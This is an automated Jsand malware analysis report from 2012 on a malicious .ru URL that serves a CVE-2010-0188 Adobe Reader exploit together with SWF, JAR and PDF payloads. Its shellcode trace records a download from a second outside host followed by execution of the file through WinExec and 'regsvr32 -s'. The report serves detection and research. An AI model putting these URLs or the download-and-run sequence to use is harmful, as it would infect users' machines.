Analysis report for http://cnnvcnsaoljfrut.ru:8080/images/aublbzdni.php

Sample Overview

URL: http://cnnvcnsaoljfrut.ru:8080/images/aublbzdni.php
Domain: cnnvcnsaoljfrut.ru
Analysis Started: 2012-03-09 06:23:07
Report Generated: 2012-03-09 06:23:15
Jsand version: 2.3.2

See the report for domain cnnvcnsaoljfrut.ru.

Detection results

Detector | Result
Jsand 2.3.2 | malicious

In particular, the following URL was found to contain malicious content:

Exploits

Name | Description | Reference
Adobe Libtiff | Libtiff integer overflow in Adobe Reader and Acrobat | CVE-2010-0188

Deobfuscation results

Evals

Writes

No writes.

Network Activity

Requests

URL | Status | Content Type
http://cnnvcnsaoljfrut.ru:8080/images/aublbzdni.php | 200 | text/html
http://cnnvcnsaoljfrut.ru:8080/images/hvincoylguat.swf | 200 | application/x-shockwave-flash
about:blank | 200 | text/html
http://cnnvcnsaoljfrut.ru:8080/images/apxmknanfveu.jar | 200 | application/zip
http://cnnvcnsaoljfrut.ru:8080/images/amypdqdzcnkqd.jar | 200 | application/zip
http://cnnvcnsaoljfrut.ru:8080/images/gthpcpxmgvjoe.php | 200 | application/pdf

Redirects

No redirects.

ActiveX controls

Shellcode


This shellcode was found on http://cnnvcnsaoljfrut.ru:8080/images/gthpcpxmgvjoe.php.

Shellcode Analysis

Shellcode API Trace

Offset | DLL.API Name and arguments | Return value
0x7c801ad9 | kernel32.VirtualProtect(lpAddress=0x402202, dwSize=255) | 1
0x7c801d7b | kernel32.LoadLibraryA(lpFileName=urlmon) | 0x1a400000
0x7c835dfa | kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\]) |
0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=http://zolindarkksokns.ru:8080/images/jw.php?i=8, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) | 0
0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) |
0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) |
0x7c81cb3b | kernel32.TerminateThread(dwExitCode=0) |

Shellcode DLLs

DLL Name
kernel32.dll
urlmon.dll

Shellcode URLs

Complete URL | Domain Name | IP Address
http://zolindarkksokns.ru:8080/images/jw.php?i=8 | zolindarkksokns.ru:8080 |

Malware

Additional (potential) malware:

URL | Type | Hash | Analysis
http://zolindarkksokns.ru:8080/images/jw.php?i=8 | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | 2845d59896de45cc6e77cc39db4b0710 |